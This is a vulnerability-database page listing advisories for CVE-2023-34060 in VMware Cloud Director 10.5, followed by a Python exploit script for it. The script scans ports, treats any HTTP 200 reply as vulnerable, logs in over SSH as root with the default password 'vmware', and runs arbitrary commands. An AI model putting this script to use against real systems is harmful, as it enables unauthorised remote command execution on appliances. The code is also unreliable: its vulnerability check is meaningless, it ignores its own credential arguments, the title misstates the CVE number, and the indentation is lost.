VMware Cloud Director 10.5 Authentication Bypass

🗓️ 13 Mar 2024 00:00:00Reported by Abdualhadi KhalifaType

packetstorm🔗 packetstormsecurity.com👁 390 Views

VMware Cloud Director 10.5 Authentication Bypass using CVE-2023-3406

Reporter	Title	Published	Views	Family All 27
0day.today	VMware Cloud Director - Bypass identity verification Exploit	8 Dec 202300:00	–	zdt
0day.today	VMware Cloud Director 10.5 - Bypass identity verification Exploit	12 Mar 202400:00	–	zdt
Circl	CVE-2023-34060	15 Nov 202305:23	–	circl
CISA	VMware Releases Security Update for Cloud Director Appliance	14 Nov 202312:00	–	cisa
CNNVD	VMware Cloud Director Security Vulnerability	14 Nov 202300:00	–	cnnvd
CVE	CVE-2023-34060	14 Nov 202320:20	–	cve
Cvelist	CVE-2023-34060	14 Nov 202320:20	–	cvelist
Exploit DB	VMware Cloud Director 10.5 - Bypass identity verification	12 Mar 202400:00	–	exploitdb
EUVD	EUVD-2023-38174	3 Oct 202520:07	–	euvd
Hive Pro Threat Advisories	VMware Unveils Critical Authentication Bypass Vulnerability in VCD Appliance	17 Nov 202308:07	–	hivepro

`# Exploit Title: [VMware Cloud Director | Bypass identity verification]  
# Google Dork: [non]  
# Date: [12/06/2023]  
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)  
# Version: [10.5]  
# CVE : [CVE-2023-34060]  
import requests  
import paramiko  
import subprocess  
import socket  
import argparse  
import threading  
  
# Define a function to check if a port is open  
def is_port_open(ip, port):  
# Create a socket object  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
# Set the timeout to 1 second  
s.settimeout(1)  
# Try to connect to the port  
try:  
s.connect((ip, port))  
# The port is open  
return True  
except:  
# The port is closed  
return False  
finally:  
# Close the socket  
s.close()  
  
# Define a function to exploit a vulnerable device  
def exploit_device(ip, port, username, password, command):  
# Create a ssh client object  
client = paramiko.SSHClient()  
# Set the policy to accept any host key  
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())  
# Connect to the target using the credentials  
client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)  
# Execute the command and get the output  
stdin, stdout, stderr = client.exec_command(command)  
# Print the output  
print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")  
# Close the ssh connection  
client.close()  
  
  
# Parse the arguments from the user  
parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")  
parser.add_argument("ip", help="The target IP address")  
parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")  
parser.add_argument("-u", "--username", default="root", help="The username for ssh")  
parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")  
parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")  
args = parser.parse_args()  
  
# Loop through the ports and check for the vulnerability  
for port in args.ports:  
# Check if the port is open  
if is_port_open(args.ip, port):  
# The port is open, send a GET request to the port and check the status code  
response = requests.get(f"http://{args.ip}:{port}")  
if response.status_code == 200:  
# The port is open and vulnerable  
print(f"Port {port} is vulnerable to CVE-2023-34060")  
# Create a thread to exploit the device  
thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))  
# Start the thread  
thread.start()  
else:  
# The port is open but not vulnerable  
print(f"Port {port} is not vulnerable to CVE-2023-34060")  
else:  
# The port is closed  
print(f"Port {port} is closed")  
  
  
`

13 Mar 2024 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.19.8

EPSS0.00087

SSVC